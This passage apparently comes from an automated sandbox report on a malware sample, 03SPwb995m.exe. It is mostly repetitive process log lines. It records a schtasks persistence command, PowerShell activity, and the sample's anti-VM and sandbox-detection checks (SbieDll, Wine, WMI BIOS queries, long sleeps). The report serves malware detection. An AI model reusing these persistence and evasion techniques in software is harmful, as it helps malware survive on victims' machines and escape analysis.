                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp7B67.tmp
                      Source: C:\Users\user\Desktop\03SPwb995m.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 00000000.00000002.678751363.0000000002F7E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.678411503.0000000002DD1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 03SPwb995m.exe PID: 1364, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: 03SPwb995m.exe, 00000000.00000002.678751363.0000000002F7E000.00000004.00000001.sdmp, 03SPwb995m.exe, 00000000.00000002.678411503.0000000002DD1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: 03SPwb995m.exe, 00000000.00000002.678751363.0000000002F7E000.00000004.00000001.sdmp, 03SPwb995m.exe, 00000000.00000002.678411503.0000000002DD1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\03SPwb995m.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\03SPwb995m.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\03SPwb995m.exe TID: 7120Thread sleep time: -39419s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exe TID: 7156Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5684Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exe TID: 5792Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exe TID: 6748Thread sleep count: 1581 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exe TID: 6748Thread sleep count: 8273 > 30Jump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\03SPwb995m.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6057Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2378Jump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeWindow / User API: threadDelayed 1581Jump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeWindow / User API: threadDelayed 8273Jump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\03SPwb995m.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\03SPwb995m.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeThread delayed: delay time: 39419Jump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeThread delayed: delay time: 922337203685477Jump to behavior
